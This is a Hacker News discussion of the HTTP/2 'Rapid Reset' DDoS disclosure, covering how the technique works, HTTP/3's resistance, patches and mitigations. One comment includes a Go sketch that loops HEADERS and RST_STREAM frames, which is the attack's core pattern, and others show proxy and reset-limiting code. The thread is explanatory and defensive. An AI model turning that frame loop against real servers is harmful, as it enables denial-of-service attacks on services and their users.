HTTP/2 zero-day vulnerability results in record-breaking DDoS attacks (cloudflare.com)
202 points by kayfox 7 months ago | 71 comments



Related ongoing threads:

The novel HTTP/2 'Rapid Reset' DDoS attack - https://news.ycombinator.com/item?id=37830987

The largest DDoS attack to date, peaking above 398M rps - https://news.ycombinator.com/item?id=37831062




So is nginx with http2 enabled vulnerable too? Caddy? Or should I not worry about this, because a small (by Cloudflare's scale) botnet can DDoS a single server completely anyway?


Go is patching it soon: https://github.com/caddyserver/caddy/issues/5877#issuecommen...

(Caddy just uses Go's HTTP/2 implementation.)


Go patches are out. (1.21.3, 1.20.10)




I'm curious to learn more. How much work is it to establish a stream and close it? It feels like something that could be done very quickly, but it also involves setting up some state (stream buffers) that could be a problem too.


The cost comes from initiating the request to some backend which presumably starts working on it.


Does HTTP/3 suffer from this kind of complexity bloat?


Well, it requires almost an order of magnitude more energy to serve HTTP/3 than HTTP/1, so maybe?

Why do I say this? Because it breaks nearly every optimization that's been made to serve content efficiently over the last 25 years (sendfile, TSO, kTLS, etc.), and requires that the server's CPU touch every byte of data multiple times (rather than never, for HTTP/1). It's basically the "what if I do everything wrong" case in my talk here: https://people.freebsd.org/~gallatin/talks/euro2022.pdf

Given enough time, it may yet get close to HTTP/1. But it's still early days.


no it's more efficient in every way, they called it QUIC not SLO


That's why they don't have data centers in San Luis Obispo.


Bit of a leading question, since you're assuming that this is "complexity bloat" and not just "a feature that people use", but yes, HTTP/3 has streams and so it should be vulnerable.


HTTP/3 is not vulnerable to this specific attack (Rapid Reset), because it has an extra confirmation step before the sender can create a new stream.

HTTP/2 and HTTP/3 both have a limit on the number of simultaneous streams (requests) the sender may create. In HTTP/2, the sender may create a new stream immediately after sending a reset for an existing one. In HTTP/3, the receiver is responsible for extending the stream limit after a stream closes, so there is backpressure limiting how quickly the sender may create streams.
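For concreteness, here is a rough Go sketch of the frame sequence being described, using golang.org/x/net/http2. It is illustrative only: there is no TLS/ALPN handshake, the server's SETTINGS are ignored, and example.test is a placeholder authority.

    // Sketch of the HTTP/2 "request then immediately reset" frame sequence.
    package sketch

    import (
        "bytes"
        "io"
        "net"

        "golang.org/x/net/http2"
        "golang.org/x/net/http2/hpack"
    )

    func requestAndReset(conn net.Conn, pairs int) error {
        // Client connection preface, then an empty SETTINGS frame.
        if _, err := io.WriteString(conn, http2.ClientPreface); err != nil {
            return err
        }
        fr := http2.NewFramer(conn, conn)
        if err := fr.WriteSettings(); err != nil {
            return err
        }

        // Encode a trivial GET header block once and reuse it.
        var buf bytes.Buffer
        enc := hpack.NewEncoder(&buf)
        for _, hf := range []hpack.HeaderField{
            {Name: ":method", Value: "GET"},
            {Name: ":path", Value: "/"},
            {Name: ":scheme", Value: "https"},
            {Name: ":authority", Value: "example.test"},
        } {
            if err := enc.WriteField(hf); err != nil {
                return err
            }
        }

        // HEADERS immediately followed by RST_STREAM. In HTTP/2 the reset
        // frees the slot counted against SETTINGS_MAX_CONCURRENT_STREAMS,
        // so the client never waits before opening the next stream; in
        // HTTP/3 it would have to wait for the server to raise the limit
        // with a MAX_STREAMS frame.
        for i, id := 0, uint32(1); i < pairs; i, id = i+1, id+2 {
            if err := fr.WriteHeaders(http2.HeadersFrameParam{
                StreamID:      id,
                BlockFragment: buf.Bytes(),
                EndStream:     true,
                EndHeaders:    true,
            }); err != nil {
                return err
            }
            if err := fr.WriteRSTStream(id, http2.ErrCodeCancel); err != nil {
                return err
            }
        }
        return nil
    }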


Thanks. I'm curious to see how the backpressure ends up playing out in terms of "do you need 10k boxes to DoS vs 100k vs not feasible".


> assuming that this is "complexity bloat" and not just "a feature that people use"

¿Por qué no los dos? (Why not both?)

:)


Bloat implies that it isn't useful - that it's just dead weight.

If a lot of people use the thing, it must provide some value to them.


Well, to me "bloat" and "useful + used" are incompatible. The feature only made it into HTTP/2 because it saw validation from gRPC, I believe.


A number of people have expressed concerns about making the relatively simple protocol more and more complicated in the name of performance. This looks like it's going to be their "Ha, told you so!" moment.


It reminds me of Meltdown/Spectre: you have a pipe, and instructions need to flow through it in a single file line. Let's increase performance by allowing things to be sent/processed out-of-order!


That's a good example, because it would be an incredibly bad decision to drop speculative execution since it leads to a massive performance improvement.


Technically the issue is speculative execution, not out-of-order execution (i.e. "allowing things to be sent/processed out-of-order!"). Most high-performance processors have both, but you can have one without the other.


True, fair point.


My problem is that it often seems like significant complexity is added in order to chase marginal performance gains. I suppose performance is relatively easy to measure while complexity is not.


This seems like a hyperbolic misuse of both “vulnerability” and “zero-day”.


How is it not a vulnerability?


A vulnerability is a flaw in the implementation that allows an attacker to trigger some kind of unexpected result. The result in this case is defined in an RFC. It is 100% working as intended.


A protocol can also have a vulnerability (the term is not constrained to implementation flaws only)


So your contention is that the creators of HTTP/2 intended for all users of it to be DDoSed?


I mean yes, much as http1 allows for people to be ddosed.


What is the vulnerability anyway? I skimmed the linked article twice and could find no explanation of how it works, beyond "request, cancel, request, cancel" and that it's called Rapid Reset. Why is HTTP/2 in particular vulnerable? Are all protocols supporting streams vulnerable? How is it possible to vomit such a long article with so little information?


The article we're discussing has a link to this deeper description: https://blog.cloudflare.com/technical-breakdown-http2-rapid-...


> HTTP/2 protocol — a fundamental protocol that is critical to how the Internet and all websites work

No, it isn't. This whole article seems more like a marketing sales pitch than a disclosure.


I visited a few common sites and they seem to use HTTP/2. I'm not sure what the point is of arguing it's not fundamental; a cursory glance shows HTTP/1 is bottlenecked by not being able to serve multiple resources concurrently over the same TCP connection (something HTTP/2 fixes). Is there ire against HTTP/2 adoption, and for what reasons?


I'm not an area expert, but common issues raised over the years:

- HTTP/2 as implemented by browsers requires HTTPS, and some people don't like HTTPS.

- HTTP/2 was "designed by a committee" and has a lot of features and complexity; most of those features were never implemented by most servers/clients; many of the advanced features that were implemented were very naive "checkbox implementations" and/or buggy [0]; some were implemented and then turned out to be more harmful than useful, and got dropped (HTTP/2 push in browsers [1]); etc.

[0] https://github.com/andydavies/http2-prioritization-issues

[1] https://developer.chrome.com/blog/removing-push


Every tech company uses HTTP/2. I'm confused as to what the comment before yours is trying to say, it doesn't seem to be supported by any facts.


HTTP/1.1 connections can be reused, including with pipelining, and a client can open multiple sockets to make requests in parallel. HTTP/2 allows out-of-order responses on one socket. Is it worth the complexity? HTTP/1.1 is over 20 years old and battle-tested.


Clients stopped using HTTP/1.1 pipelining because it just didn't work well enough.

https://en.wikipedia.org/wiki/HTTP_pipelining#Implementation...


Actually even the diagrams are wrong because they focus on a single connection to explain the problem, carefully omitting the fact that a client can easily open many connections to do the same again. I agree it's mostly marketing and press-releases.


Yes, the attackers will obviously open many connections. In fact, they've always opened as many connections as they have resources for.

But establishing a connection is extremely expensive compared to sending data on an already established channel. With this method they need to open far fewer connections for the same qps.

There's no need to confuse the issue by trying to diagram multiple connections at the same time.


tl;dr HTTP/2 allows clients to DDoS backends much more effectively by using the multiple-stream feature of HTTP/2 to amplify their attack directly inside the reverse proxy (which typically translates HTTP/2 to HTTP/1).

> When Cloudflare's reverse proxies process incoming HTTP/2 client traffic, they copy the data from the connection’s socket into a buffer and process that buffered data in order. As each request is read (HEADERS and DATA frames) it is dispatched to an upstream service. When RST_STREAM frames are read, the local state for the request is torn down and the upstream is notified that the request has been canceled. Rinse and repeat until the entire buffer is consumed. However this logic can be abused: when a malicious client started sending an enormous chain of requests and resets at the start of a connection, our servers would eagerly read them all and create stress on the upstream servers to the point of being unable to process any new incoming request.
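A rough sketch of the proxy pattern that paragraph describes (this is not Cloudflare's actual code; dispatchUpstream is a hypothetical stand-in for whatever forwards a request to an origin):

    // Frames are read in order: each HEADERS starts an upstream request,
    // each RST_STREAM cancels it. By the time the cancel lands, the
    // upstream may already have done real work.
    package sketch

    import (
        "context"

        "golang.org/x/net/http2"
    )

    func proxyReadLoop(fr *http2.Framer, dispatchUpstream func(ctx context.Context, streamID uint32)) error {
        cancels := map[uint32]context.CancelFunc{}
        for {
            frame, err := fr.ReadFrame()
            if err != nil {
                return err
            }
            switch f := frame.(type) {
            case *http2.HeadersFrame:
                ctx, cancel := context.WithCancel(context.Background())
                cancels[f.StreamID] = cancel
                go dispatchUpstream(ctx, f.StreamID) // upstream work starts immediately
            case *http2.RSTStreamFrame:
                if cancel, ok := cancels[f.StreamID]; ok {
                    cancel() // notify the upstream that the request was cancelled
                    delete(cancels, f.StreamID)
                }
            }
        }
    }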


> which typically translates HTTP/2 to HTTP/1

Sticking with HTTP/2, or going with grpc/similar is also possible. It depends on which corner of the Internet you inhabit. (Cloudflare isn't the whole Internet, yet)


how on earth did nobody anticipate this kind of attack when designing the protocol? it's very obvious it can be abused like this


It took 8 years for somebody to discover this. It can't have been that obvious.


> It took 8 years for somebody to discover this. It can't have been that obvious.

Actually that's not true, it was already suggested here as a way to circumvent the max_concurrent_streams setting, and it seemed particularly obvious: https://lists.w3.org/Archives/Public/ietf-http-wg/2019JanMar...

As soon as you start to implement a proxy that supports H2 on both sides, that's something you immediately spot, because setting timeouts too low on your first stage easily fills the second stage, so you have to cover that case.

I think that the reality is in fact that some big corp had several outages due to these attacks and it makes them look better to their customers to say "it's not our fault we had to fight zero-days" than "your service was running on half-baked stacks", so let's just go make a lot of noise about it to announce yet-another-end-of-the-net.


It took eight years for somebody to use this. We don't know when it was discovered (nor how many times by how many different people.)


I remember noticing this from the HTTP/2 RFC, maybe 8y ago. I was studying the head of line blocking issue on a custom protocol atop TCP and was curious to compare with HTTP/2. I think I might even have chatted with a coworker about it at the time, as he was implementing grpc (which uses HTTP/2) in Rust.

It never occurred to me that it could be used nefariously!


Not everyone cares about Cloudflare, or even HTTP/2.

The exploit has more to do with their implementation than the protocol.


Google was apparently DOSed by the same sort of attack: https://news.ycombinator.com/item?id=37831062


Meanwhile several different HTTP/2 implementations are dropping fixes for this today.


> The exploit has more to do with their implementation than the protocol.

Is it? I imagine that implementations can do things like make creating/dropping a stream faster but how would an implementation flat out mitigate this?


There is a maximum bandwidth at which data can arrive. Simply make sure you can always process it faster than the next packet can arrive, or implement proper mitigation in cases where you cannot.

It's called programming under soft real-time constraints.
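As a concrete example of "proper mitigation", one pattern (details vary across implementations, and the threshold below is invented for illustration) is to count client-initiated resets per connection and hang up on abusive connections with GOAWAY:

    // Track per-connection reset behaviour and drop connections that reset
    // an abusive fraction of the streams they open.
    package sketch

    import "golang.org/x/net/http2"

    type resetCounter struct {
        opened int // streams the client opened (HEADERS frames seen)
        reset  int // streams the client reset (RST_STREAM frames seen)
    }

    func (c *resetCounter) onHeaders()   { c.opened++ }
    func (c *resetCounter) onRSTStream() { c.reset++ }

    // abusive reports whether this connection should be dropped.
    func (c *resetCounter) abusive() bool {
        return c.opened >= 100 && 2*c.reset > c.opened
    }

    // hangUp tells the peer which streams will still be processed;
    // the caller then closes the TCP connection.
    func hangUp(fr *http2.Framer, lastProcessedStreamID uint32) error {
        return fr.WriteGoAway(lastProcessedStreamID, http2.ErrCodeEnhanceYourCalm, []byte("too many stream resets"))
    }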


Well yeah, that's just how DoS kinda works with these sorts of vulns. "Be faster" is obviously a good strategy, but is it viable? Is setting up and canceling a stream something that can be done at GB/s speeds? Maybe, idk.


If you push an arbitrary amount of pressure through a pipe that can only handle 1000 psi, you need a valve to release the excess pressure, or it will blow up.

In the real world, pipes cannot deliver arbitrary pressure, so your constraint is more bounded than this. So if you receive 2000 psi but your pipes can only handle 1000, you just need a small component that can handle the 2000 to split the pressure in two, and you can handle it all without releasing any.

The same applies to digital logic; it's always possible to build something such that you can guarantee processing within a bounded amount of time by optimizing and sizing the resources correctly.

As the term "digital logic" suggests, these sorts of guarantees are more often applied when designing hardware than software, but they can apply to either.


> Simply make sure you can always process it faster than the next packet can arrive

This is pretty much impossible unless you make the client do a proof-of-work so they can't send requests very quickly. Okay, you could use a slow connection so that requests can't arrive very quickly, but then the DoS is upstream.


HTTP/1 between a client-server pair incurs per-request overhead which is not present in HTTP/2. You can do more RPS with less CPU if you use HTTP/2.


You receive an Ethernet frame, you send an Ethernet frame.

The concept of a TCP session is purely virtual; it's just a pair of 16-bit port numbers in the headers grouping the packets together.


OK.


It's pretty similar to HTTP/1 pipelining, though no reverse proxy I'm aware of supports it.


From what I can tell, people were talking about reset flooding back in July. Not as a novel thing, either; it's listed as just one of several known vulnerabilities, suggesting this kind of thing has been known about for a while.

https://pentestmag.com/good-bad-and-the-ugly-of-http-2/

I genuinely don't know if this is a real zero-day, or if it's a known protocol vulnerability that nobody was mitigating.



Hindsight is 20/20


This is the reason you need a security researcher that is actively exploiting things.


It is, but most companies see that as a cost without upside until they get compromised.


This sounds like an IP spoofing issue: an IP/layer-3 problem where ISPs don't filter spoofed addresses from their users. There are technical solutions, but what should also happen is cutting off these ISPs from the internet as a whole when there is a large-scale DDoS affecting global network performance.


No. This is not an ISP problem and the ISP cannot solve this - it's not even visible to the ISP for encrypted connections. This is a problem with HTTP/2 itself that web servers / load balancers / proxies need to account for.


You're right. My fault.


This attack just spams requests to a web server. The novel part of the attack is that it also spams packets to cancel those requests to bypass any concurrency limits that may be in place.


Yup, I failed by not actually reading past the first few sentences.



